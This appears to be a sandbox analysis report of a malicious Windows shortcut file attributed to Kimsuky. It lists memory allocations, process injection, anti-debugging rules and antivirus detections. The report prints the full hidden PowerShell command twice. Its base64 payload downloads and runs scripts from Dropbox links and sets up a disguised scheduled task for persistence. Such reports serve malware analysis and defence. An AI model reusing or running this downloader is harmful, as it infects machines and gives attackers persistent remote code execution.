base_address: 0x050b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050b8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050b9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050bd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050be000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050bf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\chrome.ps1
file C:\Users\test22\AppData\Roaming\user.ps1
file C:\Users\test22\AppData\Local\Temp\도양기업 20240610 송장 갑지.bmp.lnk
cmdline "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"JGhoaCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIuuPhOyWkeq4sOyXhSAyMDI0MDYwOCDshqHsnqUg6rCR7KeALmJtcCI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9xdW82M3FtOGQzaXFsaG1weWliN3AvMjAyNDA2MDguYm1wP3Jsa2V5PXNicGNndWJnaTBpeGl5bm01bGJzbnE4MXAmc3Q9eWxkYnNyb3UmZGw9MCIgLU91dEZpbGUgJGhoaDsgJiAkaGhoOyAkcHBwID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJjaHJvbWUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJ0ZW1wLnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS82dzkwdGxybndtajgzNTM3ZTltZDcvMDYxMHNhZmUteC50eHQ/cmxrZXk9ZDZjZWR2dGVvazNreWVwbmZweHRuM2k5aSZzdD15YjRqendzMCZkbD0wIiAtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJHBwcCAtRW5jb2RpbmcgVVRGODsgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlclNoZWxsLmV4ZScgLUFyZ3VtZW50ICctV2luZG93U3R5bGUgSGlkZGVuIC1ub3AgIC1Ob25JbnRlcmFjdGl2ZSAtTm9Qcm9maWxlIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1Db21tYW5kICImIHskYWJjID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpIFwiY2hyb21lLnBzMVwiOyAmICRhYmM7fSInOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtT25jZSAtQXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIkNocm9tZVVwZGF0ZUNvcmVUYXNrTWFjaGluZUtPUiIgLUFjdGlvbiAkYWN0aW9uIC1UcmlnZ2VyICR0cmlnZ2VyIC1TZXR0aW5ncyAkc2V0dGluZ3M7ICAkYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJzeXN0ZW1fZmlyc3QucHMxIjsgd2dldCAtVXJpICJodHRwczovL2RsLmRyb3Bib3h1c2VyY29udGVudC5jb20vc2NsL2ZpL3M3ZDZhd2lkNTh4cjg5aHRsbnl5Yy8wNjEwc2FmZS1mLnR4dD9ybGtleT1lcXhiY2gyMW5pbGhnd29ydHl3MHhiYmk5JnN0PXd3Y3RzeWIyJmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = $env:appdata;$dd = \"user.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; & $ee; Remove-Item -Path $ee -Force;"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2216
thread_handle: 0x00000334
process_identifier: 2204
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"JGhoaCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIuuPhOyWkeq4sOyXhSAyMDI0MDYwOCDshqHsnqUg6rCR7KeALmJtcCI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9xdW82M3FtOGQzaXFsaG1weWliN3AvMjAyNDA2MDguYm1wP3Jsa2V5PXNicGNndWJnaTBpeGl5bm01bGJzbnE4MXAmc3Q9eWxkYnNyb3UmZGw9MCIgLU91dEZpbGUgJGhoaDsgJiAkaGhoOyAkcHBwID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJjaHJvbWUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJ0ZW1wLnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS82dzkwdGxybndtajgzNTM3ZTltZDcvMDYxMHNhZmUteC50eHQ/cmxrZXk9ZDZjZWR2dGVvazNreWVwbmZweHRuM2k5aSZzdD15YjRqendzMCZkbD0wIiAtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJHBwcCAtRW5jb2RpbmcgVVRGODsgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlclNoZWxsLmV4ZScgLUFyZ3VtZW50ICctV2luZG93U3R5bGUgSGlkZGVuIC1ub3AgIC1Ob25JbnRlcmFjdGl2ZSAtTm9Qcm9maWxlIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1Db21tYW5kICImIHskYWJjID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpIFwiY2hyb21lLnBzMVwiOyAmICRhYmM7fSInOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtT25jZSAtQXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIkNocm9tZVVwZGF0ZUNvcmVUYXNrTWFjaGluZUtPUiIgLUFjdGlvbiAkYWN0aW9uIC1UcmlnZ2VyICR0cmlnZ2VyIC1TZXR0aW5ncyAkc2V0dGluZ3M7ICAkYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJzeXN0ZW1fZmlyc3QucHMxIjsgd2dldCAtVXJpICJodHRwczovL2RsLmRyb3Bib3h1c2VyY29udGVudC5jb20vc2NsL2ZpL3M3ZDZhd2lkNTh4cjg5aHRsbnl5Yy8wNjEwc2FmZS1mLnR4dD9ybGtleT1lcXhiY2gyMW5pbGhnd29ydHl3MHhiYmk5JnN0PXd3Y3RzeWIyJmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = $env:appdata;$dd = \"user.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; & $ee; Remove-Item -Path $ee -Force;"
filepath_r: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000033c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Process injection Process 3012 resumed a thread in remote process 2204
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2204
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noninteractive value Prevents creating an interactive prompt for the user
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Lionic Trojan.WinLNK.Pantera.4!c
CAT-QuickHeal Lnk.trojan.A12626210
Skyhigh BehavesLike.Trojan.fl
VIPRE Heur.BZC.YAX.Pantera.10.6C912DC4
Arcabit Heur.BZC.YAX.Pantera.10.6C912DC4
Symantec Scr.Mallnk!gen1
ESET-NOD32 LNK/Kimsuky.K
McAfee Artemis!09B1213C8A33
Avast LNK:Agent-EL [Trj]
Kaspersky HEUR:Trojan.Multi.Powecod.a
BitDefender Heur.BZC.YAX.Pantera.10.6C912DC4
MicroWorld-eScan Heur.BZC.YAX.Pantera.10.6C912DC4
Rising Trojan.PSRunner/LNK!1.BADE (CLASSIC)
Emsisoft Heur.BZC.YAX.Pantera.10.6C912DC4 (B)
FireEye Heur.BZC.YAX.Pantera.10.6C912DC4
Sophos Troj/DownLnk-AY
SentinelOne Static AI - Suspicious LNK
Google Detected
MAX malware (ai score=87)
Kingsoft Script.Troj.CMDLnk.22143
ZoneAlarm HEUR:Trojan.Multi.Powecod.a
GData Heur.BZC.YAX.Pantera.10.6C912DC4
VBA32 Trojan.Link.Crafted
Ikarus BZC.YAX.Pantera
Tencent Win32.Trojan.Powecod.Ymhl
huorong TrojanDownloader/LNK.Netloader.e
AVG LNK:Agent-EL [Trj]
alibabacloud Trojan:Win/Kimsuky.K